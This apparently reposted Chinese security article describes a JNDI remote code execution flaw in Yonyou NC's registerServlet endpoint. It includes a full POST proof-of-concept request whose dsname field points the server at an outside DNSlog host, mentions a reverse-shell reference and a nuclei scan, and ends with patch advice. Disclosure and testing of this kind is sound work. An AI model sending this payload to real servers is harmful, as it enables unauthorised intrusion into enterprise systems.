【成功复现】用友NC系统JNDI 远程代码执行漏洞(JNDI)
2024-6-13 14:23:18 Author: mp.weixin.qq.com(查看原文) 阅读量:26 收藏

网安引领时代,弥天点亮未来   

0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍
用友NC是一款企业级的管理软件。它基于互联网应用,具有强大的集团管控功能和灵活的自定义功能,可以满足企业复杂业务流程的需求。同时,NC还提供了全程的客户化服务能力,能够快速响应用户的业务需求。总体来说,用友NC是一款功能全面、使用灵活的企业管理软件,能够广泛应用于各种类型的企业,助力其实现信息化和数字化管理,用友NC registerServlet接口处存在JNDI 远程代码执行漏洞。
0x02影响版本

用友-UFIDA-NC

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

漏洞复现

POST /portal/registerServlet HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 68
type=1&dsname=dns://jjjupp.dnslog.cn

测试DNSlog命令回显

JNDI工具使用参考如下:

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

3.nuclei工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.yonyou.com/https://security.yonyou.com/#/home

扫描二维码关注我们


文章来源: https://mp.weixin.qq.com/s?__biz=MzI2MzA3OTgxOA==&mid=2657165502&idx=1&sn=b1f7b81f2d70c1710c362dfce554f245&chksm=f1d4d25bc6a35b4dc264bba481dd84c9ad3f7ecc87ee54ad1551b0317d661c2ae846efae73dd&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh